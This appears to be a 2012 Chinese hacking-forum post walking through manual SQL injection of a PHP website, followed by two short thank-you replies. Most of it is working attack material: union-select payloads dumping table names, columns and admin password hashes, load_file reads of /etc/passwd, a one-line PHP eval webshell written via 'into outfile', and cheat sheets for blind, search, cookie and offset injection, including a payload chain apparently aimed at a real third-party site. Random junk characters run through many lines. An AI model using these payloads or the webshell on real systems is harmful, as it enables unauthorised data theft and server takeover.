找回密码
 立即注册
查看: 3525|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
1 y8 L) q; J; C让我看看,既然人家开口了,我也不好拒绝,那就看看吧?4 Z2 C/ j: n5 f, k
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。& J7 S' G' c$ `
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)! I9 J. A) u* O/ f6 Z3 W
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)- d- t0 z# l- X6 z0 u
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
  ]4 l1 j9 r6 A2 l4 S! F# ~Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in5 b" V( f6 d: ?( j9 H/ a, W+ J( e6 B
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入- t5 H" B/ ^( p
                         7 B" ~8 \- I" w# O! }
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,% {4 O# t& c1 z! D. R
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
, u3 \. E! D" U$ e+ T# m( w4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
* W# _: h0 O9 h6 n2 e: j5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
8 j5 E8 M; }0 [' ]4 S1 U3 M" p5 ?有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,: J9 n! I8 L% U' J9 _
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。/ v. x% R* r8 M1 t3 K
我就用的是第二个思路,$ w0 w# N$ J  l
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  # e9 Q! Y6 S+ y3 ^) T
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,3 j) {( s+ |3 n+ ?
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--$ l  }1 q$ A* [6 s! Z. o
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
5 z1 I# _0 W' [* w3 c+ r* x7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
: o) F, D0 M7 ?1 y. @+ B是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
( g( Y3 m. i  R9 u9 o1 G+ P' O- d; J提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
, }9 x) y9 F: g% x$ ]" e8 @) I然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,  Y- K+ U* ?' E: N3 J
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......1 n; T- m/ I* U# ~
下面是一些很普遍注入方式资料:4 z/ Q3 l6 a" [. ^
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
: R1 f4 V7 n, G( Q0 S& P拆半法
* ^  G1 Q0 A; \" Y" s- f6 A: Z######################################
6 M9 g& f8 h- P# H6 Xand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。/ B9 \+ }0 x8 X! l' B) n
and exists (select * from admin)
( X# E0 I- f; K* y8 m, z! ]! H$ zand exists(select id from admin)
5 W0 m, O- K0 p" Sand exists(select id from admin where id=1)& j# U5 U+ V6 U. N
and exists(select id from admin where id>1)
- G2 C- ^* n( r. p, C; U$ R然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
2 Y; i- K: m8 O! b. B& `' zand exists (select username from admin)7 P6 w4 ~1 v. v/ ]
and exists (select password from admin)
( [+ Y8 ~" i1 J& Zand exists (select id from admin where len(username)<10 and id=1)
. \  R' l1 d. `' P7 X4 a3 Wand exists (select id from admin where len(username)>5 and id=1)0 e' i4 s9 V( Z% t/ x5 _
and exists (select id from admin where len(username)=6 and id=1)  K  f7 t7 X8 x- g0 u% `2 ^
and exists (select id from admin where len(password)<10 and id=1)4 S/ ^. s  f. z" Q7 ~3 b
and exists (select id from admin where len(password)>5 and id=1)
5 P8 m8 [2 S; V3 {  u4 U0 Hand exists (select id from admin where len(password)=7 and id=1)$ ?) \$ c2 Y7 D/ b! L- n( B( y! C
and (select top 1 asc(mid(username,1,1)) from admin)=978 _! m* r# O& K* o9 a2 b: h  u
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。. t  A" ?. |' g( @
猜第二位把username,1,1改成username,2,1就可以了。5 A9 t4 K$ p6 J/ n/ Y
猜密码把username改成password就OK了" \, R8 P. Z' j, N$ H6 j' ^
##################################################+ q8 J: n0 }+ |9 I6 t0 c+ {
搜索型注入
; W- U# Q& k  X7 j) H& K1 }$ r##################################
( n+ D  K' n" |5 x  @& k' ~%' and 1=1 and '%'='
8 {/ W/ L+ ]  X' W  y%' and exists (select * from admin) and '%'='
1 x3 b8 Q' m7 _0 a%' and exists(select id from admin where id=1) and '%'='6 X$ D" T8 j% _& ^) Z7 c; f0 k' Y
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
$ H1 h+ a) O# T0 b% ]8 E%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
7 z: v2 Q3 g# c- J1 b7 V7 V%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
$ d! ]$ u; ]/ u9 A这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
# _8 x$ C  a3 P3 E5 g* Y对于MSSQL数据库,后面可以吧 and '%'='换成--
3 I8 i8 F* E& K. L还有一点搜索型注入也可以使用union语句。
( }1 v3 q, z  N, ^########################################################
6 N, _: O* ?1 m$ p: ?6 D联合查询。
1 i1 b% _  k6 D. a. K#####################################
7 |% I' C/ W; q8 A* ~5 m. G4 `: Forder by 10! {$ }; F9 I( ?' c3 F5 t6 `0 v
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
# X8 }3 c0 q8 r$ w" `# I1 {and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
6 a4 ?  Y0 O% qand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1. M0 z  o3 f+ \  Q* I' o
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)( Z  q' p" Z, i* I: P- D
###################################2 w( L* b% d: k; w& }
cookie注入* X. _% C- D) I+ p7 M5 b/ g. g& F1 ^
###############################
% u5 n  U. |5 Ahttp://www.******.com/shownews.asp?id=1273 o& {9 G1 w' i+ y: D' Q+ m  H
http://www.******.com/shownews.asp9 t; d' ?: r' K/ \- w* _
alert(="id="+escape("127"));
9 g: J7 B' I: v1 kalert(="id="+escape("127 and 1=1"));6 Q! g( Y/ ]7 _8 n1 _( |
alert(="id="+escape("127 order by 10"));
2 L- @1 X4 ?3 b% O8 _, ~alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
% X9 |" `5 D6 T% c' Yalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));- D; b0 }* T4 F1 I! M+ A- g" t
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。6 w+ m" R; G* U0 t, G
###################################
, t) H5 _5 _5 u偏移注入
; S+ _' c# V5 v& S! i# }+ o###########################################################
" C3 ~, Y1 y; t; W9 s7 wunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin# K9 j; {1 ^3 [$ |
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin3 ?$ A6 \  j3 V7 k# }
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id): S- D( T0 p8 B2 z7 i/ C: _4 g
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)% i  }3 L2 `/ a& i1 \, t  q4 r
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
: e" B% q3 q; w' N3 ]( I: wunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)0 p' l9 o/ i5 ?8 Y9 e. L: Z. B
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on1 d' O% R: O. _. c
a.id=d.id)
" g, K4 g% k5 q6 zand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)1 ~9 l# @5 c/ |+ t4 c6 m
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
# S4 m2 R- H) p* ]  9 D& A" f/ D6 j, t5 T: ~
============================================================================================================
6 N0 ^0 C' r/ `: E# ]1.判断版本
+ J  l3 @. X. ~, Cand ord(mid(version(),1,1))>51
# M; ^' V2 @6 p2 t0 Q$ w3 u6 b返回正常,说明大于4.0版本,支持ounion查询
4 X& f( U/ r/ n2 s& F2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解$ L* U/ b) h- x0 N7 x8 T8 x. Y. r
and 2=4 union select 1,2,3,4,5,6,7,8,9--( @# G6 c3 j6 F# ?: v# ^/ ^' Y+ G
3.查看数据库版本及当前用户,
! l  W4 n9 _2 ~and 2=4 union select 1,user(),version(),4,5,6,7,8,9--$ H9 K7 v8 N* R( J+ q
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,) V6 J8 _, C3 E/ r5 {7 f  O4 p$ [" U0 x
4.判断有没有写权限2 n8 i+ i# f- h' J( q0 d
and (select count(*) from MySQL.user)>0-- ( Z, p* q$ L( }& r& b
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1* \0 {0 s; w4 }
用不了这个命令,就学习土耳其黑客手法,如下; E7 F% `$ X+ o5 O
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--, i0 ^) ~2 `: O+ b1 w
6.爆表,爆库$ C' {# }6 w, M- `- Q+ y+ w
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--! T/ v3 b& b' S  ?6 k
7.爆列名,爆表
1 Y3 O# `) {) n: p# Aand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--* m* }! m1 T1 e; H: H  e; z3 H# _
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。6 b6 c7 E% S, O  |  X% s1 c
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
6 D( ~; r5 x7 o+ e& P9.爆字段内容$ v5 g; Q' v5 H& z3 B) B! Q
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
# M4 H8 g, X, d( G; {3 g  Khttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表